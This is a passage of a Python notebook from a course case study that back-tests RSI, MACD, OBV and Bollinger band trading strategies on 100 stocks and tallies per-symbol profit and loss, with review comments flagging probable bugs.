    i = 0 # per-group row counter
    j = 0 # counts recorded trades for this symbol (value apparently unused afterwards)
    number_stock = 0
    money = 10000 # Rs 10,000 stake per stock (not 10 lakhs; the summary step scales by 100)
    next_step = 1 # 1 - Buy, 0 - Sell
    for row_index, row in df_group.iterrows():
        # NOTE(review): i restarts at 0 per symbol, but index[-1] is the group's last
        # GLOBAL index label, so this guard appears to be effectively always true — confirm.
        if i <= df_group.index[-1] :
            if next_step == 0:
                if df_group.loc[row_index, 'TradingStrategyRSI_revised'] == "negative": # additional condition added
                    if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Sell":
                        if df_group.loc[row_index, 'TradingStrategyOBV'] == "Sell":
                            Back_Test_10yrs_r.append(row['Date'])
                            Back_Test_10yrs_r.append(row['Symbol'])
                            Back_Test_10yrs_r.append("Sell")
                            Back_Test_10yrs_r.append(row['Close'])
                            Back_Test_10yrs_r.append(number_stock)
                            Back_Test_10yrs_r.append(row['macd'])
                            money = money + row['Close'] * number_stock
                            next_step = 1
                            j = j + 1
            else: # first time I have to buy
                if df_group.loc[row_index, 'TradingStrategyRSI_revised'] == "positive": # additional condition added
                    if df_group.loc[row_index, 'TradingStrategymacd_revised'] == "Buy":
                        if df_group.loc[row_index, 'TradingStrategyOBV'] == "Buy":
                            number_stock = money // row['Close'] # floor division to get the integer number of stocks
                            if number_stock > 0:
                                Back_Test_10yrs_r.append(row['Date'])
                                Back_Test_10yrs_r.append(row['Symbol'])
                                Back_Test_10yrs_r.append("Buy")
                                Back_Test_10yrs_r.append(row['Close'])
                                Back_Test_10yrs_r.append(number_stock)
                                Back_Test_10yrs_r.append(row['macd'])
                                money = money - row['Close'] * number_stock
                                next_step = 0
                                j = j + 1
        i = i + 1
# +
# --- Post-processing for the RSI>25 + MACD(4,15)-9 + OBV run: flatten the trade
# --- list into a ledger, close out still-open Buy positions at the 2020-08-28
# --- close, and summarise per-symbol profit/loss via Summarize_Report. ---
# Split the consolidate list into multiple lists with 6 columns each for the list row
n = 6
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
#del Buy_Sell_dataframe_r
#del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'macd']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
# Scan the ledger; whenever a symbol's trades end on an open "Buy", emit a
# synthetic closing "Sell" at the 2020-08-28 close so P/L can be computed.
for index_row, row in Buy_Sell_dataframe_r.iterrows():
    if i == 0:
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            # symbol changed while the previous symbol was still held: close it out
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        if ((i == row_count) and (row['Txn'] == "Buy")):
            # very last ledger row is an open Buy: close it out as well
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(row['Symbol']) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(row['Qty']) # qty
            value = price * row['Qty']
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
# NOTE(review): add_rows_df carries no 'macd' column, so concat leaves NaN there for synthetic rows
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the column headers
# NOTE(review): the groupby sum is a Series; assigning .columns does not rename anything — verify
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Summarize in a dataframe: within each Symbol, diff() yields (Sell total - Buy total);
# mul(100) scales the Rs 10,000 per-stock stake up to the 10-lakh notional investment
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks & whether we have made profit/loss
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "RSI, macd, OBV", "RSI>25, macd (4,15)-9, Cum Pos OBV", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(30)
Summary_Report_df.head(30)
# number of positives we got is 55 out of 100 (increase of 3 from earlier)
# So MACD strategy needs a revision - we have currently used (EMA5 - EMA20) and then MACD9 to compare the sell and buy points
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\RSI 25 MACD 415 OBV Buy_Sell list.csv')
# +
# REVISION3 BASED ON BACK-TESTING FOR OBV STRATEGY
# OBV - BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
# results show 42 positive and a loss - so by itself - OBV may not be helpful
df1_grouped = daily_data_back_test.groupby('Symbol')
# Back-test loop driven solely by the precomputed TradingStrategyOBV signal;
# each executed trade is appended to Back_Test_10yrs_r as 6 flat fields
# (Date, Symbol, Txn, Close, Qty, OBV).
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
    i = 0 # per-group row counter
    j = 0 # counts recorded trades for this symbol (value apparently unused afterwards)
    number_stock = 0
    money = 10000 # Rs 10,000 stake per stock (not 10 lakhs; the summary step scales by 100)
    next_step = 1 # 1 - Buy, 0 - Sell
    for row_index, row in df_group.iterrows():
        # NOTE(review): i restarts at 0 per symbol, but index[-1] is the group's last
        # GLOBAL index label, so this guard appears to be effectively always true — confirm.
        if i <= df_group.index[-1] :
            if next_step == 0:
                if df_group.loc[row_index, 'TradingStrategyOBV'] == "Sell":
                    Back_Test_10yrs_r.append(row['Date'])
                    Back_Test_10yrs_r.append(row['Symbol'])
                    Back_Test_10yrs_r.append("Sell")
                    Back_Test_10yrs_r.append(row['Close'])
                    Back_Test_10yrs_r.append(number_stock)
                    Back_Test_10yrs_r.append(row['OBV'])
                    money = money + row['Close'] * number_stock
                    next_step = 1
                    j = j + 1
            else: # first time I have to buy
                if df_group.loc[row_index, 'TradingStrategyOBV'] == "Buy":
                    number_stock = money // row['Close'] # floor division to get the integer number of stocks
                    if number_stock > 0:
                        Back_Test_10yrs_r.append(row['Date'])
                        Back_Test_10yrs_r.append(row['Symbol'])
                        Back_Test_10yrs_r.append("Buy")
                        Back_Test_10yrs_r.append(row['Close'])
                        Back_Test_10yrs_r.append(number_stock)
                        Back_Test_10yrs_r.append(row['OBV'])
                        money = money - row['Close'] * number_stock
                        next_step = 0
                        j = j + 1
        i = i + 1
# +
# --- Post-processing for the OBV-only run: flatten the trade list into a
# --- ledger, close out still-open Buy positions at the 2020-08-28 close, and
# --- summarise per-symbol profit/loss via Summarize_Report. ---
# Split the consolidate list into multiple lists with 6 columns each for the list row
n = 6
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
# NOTE(review): these dels assume the previous section already created the names;
# running this cell out of order raises NameError — confirm intended cell order
del Buy_Sell_dataframe_r
del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'OBV']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
# Scan the ledger; whenever a symbol's trades end on an open "Buy", emit a
# synthetic closing "Sell" at the 2020-08-28 close so P/L can be computed.
for index_row, row in Buy_Sell_dataframe_r.iterrows():
    if i == 0:
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            # symbol changed while the previous symbol was still held: close it out
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        if ((i == row_count) and (row['Txn'] == "Buy")):
            # very last ledger row is an open Buy: close it out as well
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(row['Symbol']) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(row['Qty']) # qty
            value = price * row['Qty']
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
# NOTE(review): add_rows_df carries no 'OBV' column, so concat leaves NaN there for synthetic rows
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the column headers
# NOTE(review): the groupby sum is a Series; assigning .columns does not rename anything — verify
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Summarize in a dataframe: within each Symbol, diff() yields (Sell total - Buy total);
# mul(100) scales the Rs 10,000 per-stock stake up to the 10-lakh notional investment
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "OBV", "Cumulative Positive OBV", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\OBV Buy_Sell list.csv')
# +
# LETS LOOK AT A COMBINED STRATEGY
# COMBINED STRATEGY COVERING BOLLINGER, MACD AND OBV
# Build one combined signal per row, per symbol:
#   ENTER when Bollinger, MACD and OBV all say "Buy";
#   SELL  when Bollinger says "Buy" but MACD or OBV disagrees;
#   WAIT  otherwise (and always on the first row of each symbol).
df1_grouped = daily_data_back_test.groupby('Symbol')
COMBINED = [0]  # dummy seed; the first element is stripped off after the loop
for group_keys, df_group in df1_grouped:
    i = 0
    for row_index, row in df_group.iterrows():
        # NOTE(review): df_group.index[-1] is the last index *label* of the
        # group, not its length; comparing the counter i against it relies on
        # the frame having a 0..N-1 RangeIndex -- confirm upstream reset_index.
        if i <= df_group.index[-1] :
            if i == 0 :
                COMBINED.append("WAIT")
            else:
                if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
                    if df_group.loc[row_index, 'TradingStrategymacd'] == "Buy":
                        if df_group.loc[row_index, 'TradingStrategyOBV'] == "Buy":
                            COMBINED.append("ENTER")
                        else:
                            COMBINED.append("SELL")
                    else:
                        COMBINED.append("SELL")
                else:
                    COMBINED.append("WAIT")
        i = i + 1
# +
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
dataframe_COMBINED
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
daily_data_back_test['TradingStrategyCombined_bol_macd_obv'] = dataframe_COMBINED_corrected['COMBINED'].values
# +
# REVISION4 BASED ON BACK-TESTING FOR COMBINED STRATEGY
# BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
# Per symbol: start with a cash pot, buy the largest whole number of shares
# on ENTER, liquidate on SELL; each transaction is appended flat (5 fields
# per txn: Date, Symbol, side, Close, qty) to Back_Test_10yrs_r.
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
    i = 0 # for each group_key or Symbol
    j = 0 # counts transactions recorded for this symbol
    number_stock = 0
    money = 10000 # per-stock cash pot; NOTE(review): header comment says "10 lakhs" but pot is 10,000 -- results appear scaled x100 later, confirm
    next_step = 1 # 1 - Buy, 0 - Sell
    for row_index, row in df_group.iterrows():
        if i <= df_group.index[-1] :
            if next_step == 0:
                # if df_group.loc[row_index, 'macd'] > -250: # additional condition added
                if df_group.loc[row_index, 'TradingStrategyCombined_bol_macd_obv'] == "SELL":
                    Back_Test_10yrs_r.append(row['Date'])
                    Back_Test_10yrs_r.append(row['Symbol'])
                    Back_Test_10yrs_r.append("Sell")
                    Back_Test_10yrs_r.append(row['Close'])
                    Back_Test_10yrs_r.append(number_stock)
                    money = money + row['Close'] * number_stock
                    next_step = 1
                    j = j + 1
            else: # first time I have to buy
                # if df_group.loc[row_index, 'macd'] > -250: # additional condition added
                if df_group.loc[row_index, 'TradingStrategyCombined_bol_macd_obv'] == "ENTER":
                    number_stock = money // row['Close'] # floor division to get the integer number of stocks
                    if number_stock > 0:
                        Back_Test_10yrs_r.append(row['Date'])
                        Back_Test_10yrs_r.append(row['Symbol'])
                        Back_Test_10yrs_r.append("Buy")
                        Back_Test_10yrs_r.append(row['Close'])
                        Back_Test_10yrs_r.append(number_stock)
                        money = money - row['Close'] * number_stock
                        next_step = 0
                        j = j + 1
        i = i + 1
# +
# Settle the combined (Bollinger+MACD+OBV) back-test: frame the flat
# transaction list, synthesize closing Sells (priced at the 2020-08-28
# close) for positions still open, consolidate per symbol, and report.
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
del Buy_Sell_dataframe_r
del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
    if i == 0:
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        # Symbol changed while the previous symbol's last txn was a Buy:
        # emit a synthetic closing Sell at the 2020-08-28 close.
        # NOTE(review): bitwise & works only because both operands are plain
        # bools; the final-row check below uses `and` -- inconsistent style.
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
    # Very last transaction row is still a Buy: close it out the same way.
    if ((i == row_count) and (row['Txn'] == "Buy")):
        date = "2020-08-28"
        add_rows_list.append(date) # Date
        add_rows_list.append(row['Symbol']) # Symbol
        add_rows_list.append("Sell") # Sell
        price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
        add_rows_list.append(price) # Close price per the last date for that stock
        add_rows_list.append(row['Qty']) # qty
        value = price * row['Qty']
        add_rows_list.append(value)
        last_txn = row['Txn']
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
# NOTE(review): this is a Series; assigning .columns has no renaming effect.
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "Bollinger, MACD, OBV", "Bollinger Middle Band; MACD (12,26)>9, +ve Cum OBV", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
# number of positives we got is 51 out of 100 (better than OBV, closer to MACD but no where close to 66% thats expected) . And its a LOSS
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Bollinger MACD 1226 OBV Buy_Sell list.csv')
# +
# SINCE THE COMBINED STRATEGY COVERING BOLLINGER, MACD AND OBV DID NOT YIELD DESIRED RESULTS - LETS TRY ANOTHER COMBINATION
# THIS IS SUPPOSED TO YIELD BETTER RESULTS
# COMPRISING BOLLINGER, RSI AND OBV
# ENTER when Bollinger says "Buy", RSI momentum is "positive" and OBV says
# "Buy"; SELL when Bollinger says "Buy" but RSI or OBV disagrees; else WAIT.
df1_grouped = daily_data_back_test.groupby('Symbol')
COMBINED = [0]  # dummy seed; the first element is stripped off after the loop
for group_keys, df_group in df1_grouped:
    i = 0
    for row_index, row in df_group.iterrows():
        # NOTE(review): counter i vs index label df_group.index[-1] -- assumes
        # a 0..N-1 RangeIndex per group, confirm upstream reset_index.
        if i <= df_group.index[-1] :
            if i == 0 :
                COMBINED.append("WAIT")
            else:
                if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
                    if df_group.loc[row_index, 'TradingStrategyRSI'] == "positive":
                        if df_group.loc[row_index, 'TradingStrategyOBV'] == "Buy":
                            COMBINED.append("ENTER")
                        else:
                            COMBINED.append("SELL")
                    else:
                        COMBINED.append("SELL")
                else:
                    COMBINED.append("WAIT")
        i = i + 1
# +
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
dataframe_COMBINED
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
daily_data_back_test['TradingStrategyCombined_bol_rsi_obv'] = dataframe_COMBINED_corrected['COMBINED'].values
# +
# REVISION5 BASED ON BACK-TESTING FOR COMBINED STRATEGY
# BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
# Per symbol: buy the largest whole number of shares on ENTER, liquidate on
# SELL; each transaction appended flat (5 fields) to Back_Test_10yrs_r.
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
    i = 0 # for each group_key or Symbol
    j = 0 # counts transactions recorded for this symbol
    number_stock = 0
    money = 10000 # per-stock cash pot; comment elsewhere says "10 lakhs", results appear scaled x100 later -- confirm
    next_step = 1 # 1 - Buy, 0 - Sell
    for row_index, row in df_group.iterrows():
        if i <= df_group.index[-1] :
            if next_step == 0:
                if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_obv'] == "SELL":
                    Back_Test_10yrs_r.append(row['Date'])
                    Back_Test_10yrs_r.append(row['Symbol'])
                    Back_Test_10yrs_r.append("Sell")
                    Back_Test_10yrs_r.append(row['Close'])
                    Back_Test_10yrs_r.append(number_stock)
                    money = money + row['Close'] * number_stock
                    next_step = 1
                    j = j + 1
            else: # first time I have to buy
                if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_obv'] == "ENTER":
                    number_stock = money // row['Close'] # floor division to get the integer number of stocks
                    if number_stock > 0:
                        Back_Test_10yrs_r.append(row['Date'])
                        Back_Test_10yrs_r.append(row['Symbol'])
                        Back_Test_10yrs_r.append("Buy")
                        Back_Test_10yrs_r.append(row['Close'])
                        Back_Test_10yrs_r.append(number_stock)
                        money = money - row['Close'] * number_stock
                        next_step = 0
                        j = j + 1
        i = i + 1
# +
# Settle the combined (Bollinger+RSI+OBV) back-test: frame the flat
# transaction list, synthesize closing Sells (priced at the 2020-08-28
# close) for positions still open, consolidate per symbol, and report.
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
del Buy_Sell_dataframe_r
del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
    if i == 0:
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        # Symbol changed while the previous symbol's last txn was a Buy:
        # emit a synthetic closing Sell at the 2020-08-28 close.
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
    # Very last transaction row is still a Buy: close it out the same way.
    if ((i == row_count) and (row['Txn'] == "Buy")):
        date = "2020-08-28"
        add_rows_list.append(date) # Date
        add_rows_list.append(row['Symbol']) # Symbol
        add_rows_list.append("Sell") # Sell
        price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
        add_rows_list.append(price) # Close price per the last date for that stock
        add_rows_list.append(row['Qty']) # qty
        value = price * row['Qty']
        add_rows_list.append(value)
        last_txn = row['Txn']
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
# NOTE(review): this is a Series; assigning .columns has no renaming effect.
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "Bollinger, RSI, OBV", "Bollinger Middle Band; RSI > 50, +ve Cum OBV", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Bollinger RSI 50 OBV Buy_Sell list.csv')
# REMOVE THE EFFECT OF OBV AND SEE IF WE GET A POSITIVE WAY FORWARD - SO JUST BOLLINGER AND RSI
# ENTER when Bollinger says "Buy" and RSI momentum is "positive"; SELL when
